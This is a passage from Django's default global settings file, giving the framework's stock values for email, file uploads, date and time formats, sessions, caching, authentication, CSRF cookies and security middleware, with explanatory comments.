USE_I18N = True
LOCALE_PATHS = []
# Settings for language cookie
LANGUAGE_COOKIE_NAME = 'django_language'
LANGUAGE_COOKIE_AGE = None
LANGUAGE_COOKIE_DOMAIN = None
LANGUAGE_COOKIE_PATH = '/'
# If you set this to True, Django will format dates, numbers and calendars
# according to user current locale.
USE_L10N = False
# Not-necessarily-technical managers of the site. They get broken link
# notifications and other various emails.
MANAGERS = ADMINS
# Default content type and charset to use for all HttpResponse objects, if a
# MIME type isn't manually specified. These are used to construct the
# Content-Type header.
DEFAULT_CONTENT_TYPE = 'text/html'
DEFAULT_CHARSET = 'utf-8'
# Encoding of files read from disk (template and initial SQL files).
FILE_CHARSET = 'utf-8'
# Email address that error messages come from.
SERVER_EMAIL = 'root@localhost'
# Database connection info. If left empty, will default to the dummy backend.
DATABASES = {}
# Classes used to implement DB routing behavior.
DATABASE_ROUTERS = []
# The email backend to use. For possible shortcuts see django.core.mail.
# The default is to use the SMTP backend.
# Third-party backends can be specified by providing a Python path
# to a module that defines an EmailBackend class.
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# Host for sending email.
EMAIL_HOST = 'localhost'
# Port for sending email.
EMAIL_PORT = 25
# Whether to send SMTP 'Date' header in the local time zone or in UTC.
EMAIL_USE_LOCALTIME = False
# Optional SMTP authentication information for EMAIL_HOST.
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = False
EMAIL_USE_SSL = False
EMAIL_SSL_CERTFILE = None
EMAIL_SSL_KEYFILE = None
EMAIL_TIMEOUT = None
# List of strings representing installed apps.
INSTALLED_APPS = []
TEMPLATES = []
# Default form rendering class.
FORM_RENDERER = 'django.forms.renderers.DjangoTemplates'
# Default email address to use for various automated correspondence from
# the site managers.
DEFAULT_FROM_EMAIL = 'webmaster@localhost'
# Subject-line prefix for email messages send with django.core.mail.mail_admins
# or ...mail_managers. Make sure to include the trailing space.
EMAIL_SUBJECT_PREFIX = '[Django] '
# Whether to append trailing slashes to URLs.
APPEND_SLASH = True
# Whether to prepend the "www." subdomain to URLs that don't have it.
PREPEND_WWW = False
# Override the server-derived value of SCRIPT_NAME
FORCE_SCRIPT_NAME = None
# List of compiled regular expression objects representing User-Agent strings
# that are not allowed to visit any page, systemwide. Use this for bad
# robots/crawlers. Here are a few examples:
# import re
# DISALLOWED_USER_AGENTS = [
# re.compile(r'^NaverBot.*'),
# re.compile(r'^EmailSiphon.*'),
# re.compile(r'^SiteSucker.*'),
# re.compile(r'^sohu-search')
# ]
DISALLOWED_USER_AGENTS = []
ABSOLUTE_URL_OVERRIDES = {}
# List of compiled regular expression objects representing URLs that need not
# be reported by BrokenLinkEmailsMiddleware. Here are a few examples:
# import re
# IGNORABLE_404_URLS = [
# re.compile(r'^/apple-touch-icon.*\.png$'),
# re.compile(r'^/favicon.ico$),
# re.compile(r'^/robots.txt$),
# re.compile(r'^/phpmyadmin/),
# re.compile(r'\.(cgi|php|pl)$'),
# ]
IGNORABLE_404_URLS = []
# A secret key for this particular Django installation. Used in secret-key
# hashing algorithms. Set this in your settings, or Django will complain
# loudly.
SECRET_KEY = ''
# Default file storage mechanism that holds media.
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = None
# URL that handles the static files served from STATIC_ROOT.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = None
# List of upload handler classes to be applied in order.
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.MemoryFileUploadHandler',
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
# Maximum size, in bytes, of a request before it will be streamed to the
# file system instead of into memory.
FILE_UPLOAD_MAX_MEMORY_SIZE = 2621440 # i.e. 2.5 MB
# Maximum size in bytes of request data (excluding file uploads) that will be
# read before a SuspiciousOperation (RequestDataTooBig) is raised.
DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440 # i.e. 2.5 MB
# Maximum number of GET/POST parameters that will be read before a
# SuspiciousOperation (TooManyFieldsSent) is raised.
DATA_UPLOAD_MAX_NUMBER_FIELDS = 1000
# Directory in which upload streamed files will be temporarily saved. A value of
# `None` will make Django use the operating system's default temporary directory
# (i.e. "/tmp" on *nix systems).
FILE_UPLOAD_TEMP_DIR = None
# The numeric mode to set newly-uploaded files to. The value should be a mode
# you'd pass directly to os.chmod; see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_PERMISSIONS = None
# The numeric mode to assign to newly-created directories, when uploading files.
# The value should be a mode as you'd pass to os.chmod;
# see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_DIRECTORY_PERMISSIONS = None
# Python module path where user will place custom format definition.
# The directory where this setting is pointing should contain subdirectories
# named as the locales, containing a formats.py file
# (i.e. "myproject.locale" for myproject/locale/en/formats.py etc. use)
FORMAT_MODULE_PATH = None
# Default formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'N j, Y'
# Default formatting for datetime objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATETIME_FORMAT = 'N j, Y, P'
# Default formatting for time objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
TIME_FORMAT = 'P'
# Default formatting for date objects when only the year and month are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
YEAR_MONTH_FORMAT = 'F Y'
# Default formatting for date objects when only the month and day are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
MONTH_DAY_FORMAT = 'F j'
# Default short formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATE_FORMAT = 'm/d/Y'
# Default short formatting for datetime objects.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATETIME_FORMAT = 'm/d/Y P'
# Default formats to be used when parsing dates from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '10/25/2006', '10/25/06'
'%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'
'%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'
'%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'
'%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'
]
# Default formats to be used when parsing times from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '14:30:59'
'%H:%M:%S.%f', # '14:30:59.000200'
'%H:%M', # '14:30'
]
# Default formats to be used when parsing dates and times from input boxes,
# in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%m/%d/%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%m/%d/%Y %H:%M:%S.%f', # '10/25/2006 14:30:59.000200'
'%m/%d/%Y %H:%M', # '10/25/2006 14:30'
'%m/%d/%Y', # '10/25/2006'
'%m/%d/%y %H:%M:%S', # '10/25/06 14:30:59'
'%m/%d/%y %H:%M:%S.%f', # '10/25/06 14:30:59.000200'
'%m/%d/%y %H:%M', # '10/25/06 14:30'
'%m/%d/%y', # '10/25/06'
]
# First day of week, to be used on calendars
# 0 means Sunday, 1 means Monday...
FIRST_DAY_OF_WEEK = 0
# Decimal separator symbol
DECIMAL_SEPARATOR = '.'
# Boolean that sets whether to add thousand separator when formatting numbers
USE_THOUSAND_SEPARATOR = False
# Number of digits that will be together, when splitting them by
# THOUSAND_SEPARATOR. 0 means no grouping, 3 means splitting by thousands...
NUMBER_GROUPING = 0
# Thousand separator symbol
THOUSAND_SEPARATOR = ','
# The tablespaces to use for each model when not specified otherwise.
DEFAULT_TABLESPACE = ''
DEFAULT_INDEX_TABLESPACE = ''
# Default X-Frame-Options header value
X_FRAME_OPTIONS = 'SAMEORIGIN'
USE_X_FORWARDED_HOST = False
USE_X_FORWARDED_PORT = False
# The Python dotted path to the WSGI application that Django's internal server
# (runserver) will use. If `None`, the return value of
# 'django.core.wsgi.get_wsgi_application' is used, thus preserving the same
# behavior as previous versions of Django. Otherwise this should point to an
# actual WSGI application object.
WSGI_APPLICATION = None
# If your Django app is behind a proxy that sets a header to specify secure
# connections, AND that proxy ensures that user-submitted headers with the
# same name are ignored (so that people can't spoof it), set this value to
# a tuple of (header_name, header_value). For any requests that come in with
# that header/value, request.is_secure() will return True.
# WARNING! Only set this if you fully understand what you're doing. Otherwise,
# you may be opening yourself up to a security risk.
SECURE_PROXY_SSL_HEADER = None
##############
# MIDDLEWARE #
##############
# List of middleware to use. Order is important; in the request phase, these
# middleware will be applied in the order given, and in the response
# phase the middleware will be applied in reverse order.
MIDDLEWARE = []
############
# SESSIONS #
############
# Cache to store session data if using the cache session backend.
SESSION_CACHE_ALIAS = 'default'
# Cookie name. This can be whatever you want.
SESSION_COOKIE_NAME = 'sessionid'
# Age of cookie, in seconds (default: 2 weeks).
SESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2
# A string like ".example.com", or None for standard domain cookie.
SESSION_COOKIE_DOMAIN = None
# Whether the session cookie should be secure (https:// only).
SESSION_COOKIE_SECURE = False
# The path of the session cookie.
SESSION_COOKIE_PATH = '/'
# Whether to use the non-RFC standard httpOnly flag (IE, FF3+, others)
SESSION_COOKIE_HTTPONLY = True
# Whether to save the session data on every request.
SESSION_SAVE_EVERY_REQUEST = False
# Whether a user's session cookie expires when the Web browser is closed.
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# The module to store session data
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
# Directory to store session files if using the file session module. If None,
# the backend will use a sensible default.
SESSION_FILE_PATH = None
# class to serialize session data
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
#########
# CACHE #
#########
# The cache backends to use.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
CACHE_MIDDLEWARE_KEY_PREFIX = ''
CACHE_MIDDLEWARE_SECONDS = 600
CACHE_MIDDLEWARE_ALIAS = 'default'
##################
# AUTHENTICATION #
##################
AUTH_USER_MODEL = 'auth.User'
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/accounts/profile/'
LOGOUT_REDIRECT_URL = None
# The number of days a password reset link is valid for
PASSWORD_RESET_TIMEOUT_DAYS = 3
# the first hasher in this list is the preferred algorithm. any
# password using different algorithms will be converted automatically
# upon login
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
AUTH_PASSWORD_VALIDATORS = []
###########
# SIGNING #
###########
SIGNING_BACKEND = 'django.core.signing.TimestampSigner'
########
# CSRF #
########
# Dotted path to callable to be used as view when a request is
# rejected by the CSRF middleware.
CSRF_FAILURE_VIEW = 'django.views.csrf.csrf_failure'
# Settings for CSRF cookie.
CSRF_COOKIE_NAME = 'csrftoken'
CSRF_COOKIE_AGE = 60 * 60 * 24 * 7 * 52
CSRF_COOKIE_DOMAIN = None
CSRF_COOKIE_PATH = '/'
CSRF_COOKIE_SECURE = False
CSRF_COOKIE_HTTPONLY = False
CSRF_HEADER_NAME = 'HTTP_X_CSRFTOKEN'
CSRF_TRUSTED_ORIGINS = []
CSRF_USE_SESSIONS = False
############
# MESSAGES #
############
# Class to use as messages backend
MESSAGE_STORAGE = 'django.contrib.messages.storage.fallback.FallbackStorage'
# Default values of MESSAGE_LEVEL and MESSAGE_TAGS are defined within
# django.contrib.messages to avoid imports in this settings file.
###########
# LOGGING #
###########
# The callable to use to configure logging
LOGGING_CONFIG = 'logging.config.dictConfig'
# Custom logging configuration.
LOGGING = {}
# Default exception reporter filter class used in case none has been
# specifically assigned to the HttpRequest instance.
DEFAULT_EXCEPTION_REPORTER_FILTER = 'django.views.debug.SafeExceptionReporterFilter'
###########
# TESTING #
###########
# The name of the class to use to run the test suite
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Apps that don't need to be serialized at test database creation time
# (only apps with migrations are to start with)
TEST_NON_SERIALIZED_APPS = []
############
# FIXTURES #
############
# The list of directories to search for fixtures
FIXTURE_DIRS = []
###############
# STATICFILES #
###############
# A list of locations of additional static files
STATICFILES_DIRS = []
# The default file storage backend used during the build process
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
]
##############
# MIGRATIONS #
##############
# Migration module overrides for apps, by app label.
MIGRATION_MODULES = {}
#################
# SYSTEM CHECKS #
#################
# List of all issues generated by system checks that should be silenced. Light
# issues like warnings, infos or debugs will not generate a message. Silencing
# serious issues like errors and criticals does not result in hiding the
# message, but Django will not stop you from e.g. running server.
SILENCED_SYSTEM_CHECKS = []
#######################
# SECURITY MIDDLEWARE #
#######################
SECURE_BROWSER_XSS_FILTER = False
SECURE_CONTENT_TYPE_NOSNIFF = False
SECURE_HSTS_INCLUDE_SUBDOMAINS = False
SECURE_HSTS_PRELOAD = False
SECURE_HSTS_SECONDS = 0
SECURE_REDIRECT_EXEMPT = []
SECURE_SSL_HOST = None
SECURE_SSL_REDIRECT = False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.